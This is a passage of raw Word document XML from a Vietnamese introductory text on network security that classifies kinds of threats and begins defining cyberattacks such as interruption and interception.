          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3338E148" w14:textId="217E1EB6"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có tổ chức và không tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067EFEA1" w14:textId="7C3B1BBF"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từ bên ngoài và từ bên trong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D97CE5C" w14:textId="3AA33E99"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chủ động và đe doạ bị động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E89340A" w14:textId="6F6D5BA0" w:rsidR="00DE57E6" w:rsidRPr="00DE57E6" w:rsidRDefault="00DE57E6" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Đe doạ cố ý và vô tình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5E304" w14:textId="0A1912AC"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eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EEDF8CB" wp14:editId="3199A6E4">
            <wp:extent cx="5727700" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="12700" b="9525"/>
            <wp:docPr id="5" name="Picture 5" descr="Screen%20Shot%202019-04-11%20at%203.51.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11%20at%203.51.1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81475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA44B9F" w14:textId="75D8E98B"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1. Đe doạ có tổ chức và không tổ chức:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E629A9" w14:textId="2785C00A" w:rsidR="00DE57E6" w:rsidRDefault="00DE57E6"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có tổ chức (structured threat) là đe doạ được hoạch định trướcvào một mục đích nhất định và lâu dài.</w:t>
      </w:r>
      <w:r w:rsidR="009A3CAB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Các </w:t>
      </w:r>
      <w:r w:rsidR="00F340A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>đe doạ này đến từ những hacker thành thạo và có động cơ rõ rệt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630C1C0"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5124F894" w14:textId="44EFAF78"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không tổ chức (unstructured threat) là đe doạ mang tính tức thời và là keét quả của những hacker đơn lẻ chưa có kinh nghiệm, thường chỉ dùng công cụ có sẵn được công khai trên Internet để thử nghiệm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E68E58"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31FC22AA" w14:textId="075B8CA9"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A6438E6" wp14:editId="3C544157">
            <wp:extent cx="5728335" cy="1196975"/>
            <wp:effectExtent l="0" t="0" r="12065" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="Screen%20Shot%202019-04-11%20at%203.5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11%20at%203.58.5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1196975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2FF201"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3A2B5ED8" w14:textId="385BBA05"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Thường các đe doạ có tổ chức dẽ được che dấu và rất khó phát hiện ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A4E7C2" w14:textId="77777777" w:rsidR="00F340A4" w:rsidRDefault="00F340A4" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3801102A" w14:textId="141693F3" w:rsidR="00F340A4"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2. Các mối đe doạ từ bên trong và bên ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586AC0C" w14:textId="77777777" w:rsidR="00ED5A28" w:rsidRDefault="00F340A4"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Các mối đe doạ từ</w:t>
      </w:r>
      <w:r w:rsidR="00ED5A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bên ngoài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CFD73" w14:textId="77777777" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="001C5905">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5803EB0F" w14:textId="77777777" w:rsidR="00ED5A28" w:rsidRDefault="00F340A4" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED5A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Xuất phát từ cá nhân hoặc tổ chức bên ngoài hệ thống mạng. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41369157" w14:textId="4CEBE9A7" w:rsidR="00F340A4" w:rsidRDefault="009F7F64" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Không c</w:t>
      </w:r>
      <w:r w:rsidR="00ED5A28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ó quyền truy xuất vào hệ thống mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB21267" w14:textId="34926E15" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>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Chỉ đột nhập vào từ Internet hay bằng đường Dial – up thồng qua RAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3B0E2" w14:textId="77777777" w:rsidR="009F7F64" w:rsidRDefault="009F7F64" w:rsidP="009F7F64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EC47FC" w14:textId="2966A49C" w:rsidR="00ED5A28" w:rsidRDefault="009F7F64" w:rsidP="00ED5A28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7F64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C5CBA9" wp14:editId="7C230E2C">
            <wp:extent cx="3721100" cy="1358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100" cy="1358900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505B488" w14:textId="77777777" w:rsidR="009F7F64" w:rsidRDefault="009F7F64" w:rsidP="00ED5A28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7095E5CE" w14:textId="50AA289E" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="008F431D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="567" w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Các mối đe doạ từ bên trong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD54AFA" w14:textId="668BB60D" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="00ED5A28">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="326A8D0E" w14:textId="0C619464" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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70% các vấn đề có liên quan đến bảo mật thường đến từ bên trong mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228CBDFF" w14:textId="47E2DCCA" w:rsidR="00ED5A28" w:rsidRDefault="00ED5A28" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>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Xảy ra từ một ai đó có quyền truy xuất trong nội bộ mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116F837D" w14:textId="77777777" w:rsidR="009F7F64" w:rsidRDefault="009F7F64" w:rsidP="009F7F64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E140163" w14:textId="0C3E2EBF" w:rsidR="009F7F64" w:rsidRDefault="009F7F64" w:rsidP="009F7F64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F7F64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="489406C4" wp14:editId="71D45B93">
            <wp:extent cx="3657600" cy="1612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612900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACA1674" w14:textId="08092B32" w:rsidR="009F7F64" w:rsidRDefault="008F431D" w:rsidP="008F431D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:left="567" w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Ngăn chặn các đe doạ từ bên trong cũng quan trọng như các đe doạ từ bên ngoài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A2B99" w14:textId="77777777" w:rsidR="009F7F64" w:rsidRDefault="009F7F64" w:rsidP="00500822">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F6A3C5" w14:textId="3F3C74EC"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3.1.3. Các mối đe doạ chủ động, thụ đống, cố ý và vô tình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F94E44"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0D5E62FF" w14:textId="65D503D1"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chủ động có thể sửa đổi thông tin hoặc thay đổi tình trạng hoặc thay đổi tình trạng của 1 hệ thống. Như thay đổi bảng vạh đường của 1 Router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B9F8F"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5CCA81D4" w14:textId="4DC74D11"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thụ động: không có thay đổi dữ liệu của hệ thống. Như nghe trộm thông tin trên đường truyền, đánh cắp dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11463761"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71E4744B" w14:textId="35079EF6"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cố ý: các tấn công tinh vi có sử dụng các kiến thức hệ thống đặc biệt. Như cố tình xâm nhập mạng trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD78FE" w14:textId="77777777" w:rsidR="00500822" w:rsidRDefault="00500822" w:rsidP="00500822">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="006A126C" w14:textId="5EE099BE" w:rsidR="00500822" w:rsidRDefault="00500822" w:rsidP="0050082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t>Đe doạ vô tình: một sự kiện ngẫu nhiên có thể gây hại cho hệ thống. Như chế độ đặc quyền tự động được login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1A7F3" w14:textId="0D79FF9B" w:rsidR="00500822" w:rsidRPr="00500822" w:rsidRDefault="00E80687" w:rsidP="00E80687">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="3840"/>
        </w:tabs>
        <w:ind w:right="-52"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4F865F" wp14:editId="31E2B2AB">
            <wp:extent cx="2933700" cy="2921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2921000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF2CE0B" w14:textId="15F6C7A0" w:rsidR="00372720" w:rsidRPr="00C73388"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 Tấn công mạng:</w:t>
      </w:r>
      <w:r w:rsidR="00DE57E6" w:rsidRPr="00DE57E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD7535D" w14:textId="3754F53B"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1. 1. Tần công mạng là gì:</w:t>
      </w:r>
      <w:r w:rsidR="009F7F64" w:rsidRPr="009F7F64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA5E8AF" w14:textId="62CAD6EF"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ấn công mạng hay còn gọi là chiến tranh trên không gian mạng. Có thể hiểu tấn công mạng là hình thức tấn công xâm nhập vào một hệ thống mạng máy tính, cơ sở dữ liệu, hạ tầng mạng, website, thiết bị của một cá nhân hoặc một tổ chức nào đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBFBCB" w14:textId="77777777" w:rsidR="00E80687" w:rsidRPr="00C73388" w:rsidRDefault="00E80687" w:rsidP="00372720">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EA6065" w14:textId="77777777" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00E80687">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Giai đoạn truyền tin (interruption):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280F662" w14:textId="77777777" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00E80687">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1878D277" w14:textId="77777777" w:rsidR="00E80687" w:rsidRPr="00E80687" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Các thông tin quý báu có thể bị phá huỷ, không sử dụng được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2ECFEE" w14:textId="77777777" w:rsidR="00E80687" w:rsidRPr="00E80687" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Dạng tấn công vào tính sẵn sàng của thông tin (availability).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DC4981" w14:textId="07E7E553" w:rsidR="00372720" w:rsidRPr="00E80687" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Nó có thể phá huỷ đĩa cứng, cắt đường dây truyền tải, phá hỏng hệ thống quản lý file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23877736" w14:textId="42FC5B8D" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00372720">
      <w:p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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665107F6" wp14:editId="53F2676D">
            <wp:extent cx="5727700" cy="1290320"/>
            <wp:effectExtent l="0" t="0" r="1270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290320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576B471" w14:textId="3EDF0981" w:rsidR="00E80687" w:rsidRDefault="00E80687"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3805501C" w14:textId="5708099E" w:rsidR="00E80687" w:rsidRDefault="00E80687"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hặn giữ thông tin (interception):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EDED8" w14:textId="77777777" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A65C3B2" w14:textId="724DB172" w:rsidR="00E80687" w:rsidRPr="00E80687" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Người không được uỷ quyền cố găng truy cập tới thông tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE520B2" w14:textId="667003C6" w:rsidR="00E80687" w:rsidRPr="00E80687" w:rsidRDefault="00E80687" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Dạng tấn công vào tính riêng tư của thông tin (confidentiality).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D5F8C" w14:textId="22F0825C" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00372720">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7642C699" w14:textId="775009F6" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="007F0962">
      <w:pPr>
        <w:jc w:val="cente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noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3948E1E9" wp14:editId="10AC3A74">
            <wp:extent cx="2729865" cy="1734820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="Picture 14" descr="Screen%20Shot%202019-04-11%20at%204.3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4-11%20at%204.36.3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865" cy="1734820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B94050" w14:textId="77777777" w:rsidR="00E80687" w:rsidRDefault="00E80687" w:rsidP="00E80687">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
